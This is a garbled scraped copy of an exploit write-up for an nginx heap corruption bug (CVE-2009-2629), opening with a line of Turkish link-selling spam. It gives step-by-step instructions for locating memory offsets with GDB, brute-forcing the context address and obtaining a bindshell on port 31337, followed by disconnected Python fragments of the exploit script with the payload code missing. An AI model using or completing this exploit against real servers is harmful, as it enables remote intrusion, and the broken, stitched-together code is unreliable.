hacklink, hacklink satış, hack link, hacklink satışı, facebook hacklink, hack link satışı, hack
# Exploit Title: nginx heap corruption
# Date: 08/26/2010
# Author: aaron conole
# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz
# Version: <= 0.6.38, <= 0.7.61
# Tested on: BT4R1 running nginx 0.6.38 locally
# CVE: 2009-2629
# note: this was written and tested against BT4. This means it's an
# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV
# also - only tested successfully against nginx 0.6.38
# you'll definitely need to modify against other versions
# you'll need to know where the offset is going to land, and what the pad is
# from that point to when you've tained execution flow.
# A quick way to find out just for verification would be to launch nginx,
# attach GDB to the worker and target it with the exploit, setting the offset
# to 0, or some other arbitrary value. It should crash on a piece of code which
# if (ctx->offset)
# At that point, merely dump the *r; capture the value for the data pointer
# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the
# hex pointer value). That should give you a good area to test with. You might
# want to use the range at that point and set the last octet to 00.
# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet
# found a "magic" combination that would cause the state machine to do
# what I want to make the bug trigger. Once I do, you can bet BUG will be
#Basically, on BT4:
#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")
#- Launch nginx, and attach GDB to the worker
#- Send the exploit at it with offset 0x11111111
#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"
#- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f).
#- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going).
#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag
#- In a minute or two, you should be given the shell.
# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)
# NOTE - this shellcode was shamelessly stolen from the www
# port 31337 bindshell for /bin/sh
# Why did I write this up this way? Because given enough time, I think I can
# find a proper set of state change which can give me the same effect (ie: ../
# appearing as the 3rd, 4th, and 5th characters) at a later date.
# That's all controlled by the complex uri parsing bit, though.
# taken from the metasploit pattern_create.rb
sock.connect( (host, port) )
r, w, e
select.select( [sock, sys.stdin],
[sock, sys.stdin] )
"usage: %s [-b]"
"[*] exploit for nginx <= 0.6.38 CVE 2009-2629"
"[*] host = the remote host name"
"[*] port = the remote port"
"[*] ctx_addr is where the context address should begin at"
"[*] -b specifies a brute-force (which will start at ctx_addr"
"[*] target: %s:%d"
"[*] error: %s"
"[*] sending exploit string to %s:%d"
#the output context structure
#this is the context object - some null ptrs, then we set range, then
#this is the data buffer object
#this is the pool memory structure ..
# this is the range structure
"[*] Successful Exploit via buffer: %x"